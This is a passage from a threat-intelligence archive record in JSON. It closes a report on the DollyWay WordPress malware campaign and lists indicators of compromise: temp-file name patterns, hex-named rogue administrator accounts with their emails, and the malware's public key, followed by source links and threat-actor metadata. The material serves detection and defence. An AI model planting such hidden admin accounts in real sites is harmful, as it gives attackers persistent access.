\r\n\u003ctemp-dir\u003e/base64_decode\u003crandom-string\u003e \r\n\u003ctemp-dir\u003e/plugins\u003crandom-string\u003e \r\n\u003ctemp-dir\u003e/sys_get_temp_dir\u003crandom-string\u003e \r\nMalicious admin accounts: \r\nUsernames: Random hexadecimal strings (up to 32 characters) \r\nEmail pattern: \u003csame-as-username\u003e@[random-hex].com \r\nUsername  Email \r\n7591c62c3c443a75fbdf9fadfbe2802f  7591c62c3c443a75fbdf9fadfbe2802f@113c971f77f8.com \r\n36e21a1c8c  36e21a1c8c@d5b53904ee84dac8d41331f0b.com \r\n6fcb1f44c9b1772a0  6fcb1f44c9b1772a0@1a8001dc2c3607.com \r\n3cc40c79f2d7217139a8  3cc40c79f2d7217139a8@27d831561ab46a5244a82.com \r\nPublic Key: \r\n-----BEGIN PUBLIC KEY-----\r\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKLN9azzu/i/HYvYc+0CW5DViGIuCJbz\r\n23skWsSTwkO6wSga7QJU+m0elAll3iGTFOSFzXChhlluOrW6+VVLXb8CAwEAAQ==\r\n-----END PUBLIC KEY-----\r\nRelated content:\r\nInside DollyWay’s C2 Infrastructure: Traffic Direction Systems and the LosPollos Connection\r\nDollyWay’s Eight-Year Evolution: From Master134 to Modern Malware Infrastructure\r\nSource: https://www.godaddy.com/resources/news/dollyway-world-domination\r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.godaddy.com/resources/news/dollyway-world-domination"
	],
	"report_names": [
		"dollyway-world-domination"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a3fde87f597cecbd40ba069b1bdf2876c13ead98.pdf",
		"text": "https://archive.orkl.eu/a3fde87f597cecbd40ba069b1bdf2876c13ead98.txt",
		"img": "https://archive.orkl.eu/a3fde87f597cecbd40ba069b1bdf2876c13ead98.jpg"
	}
}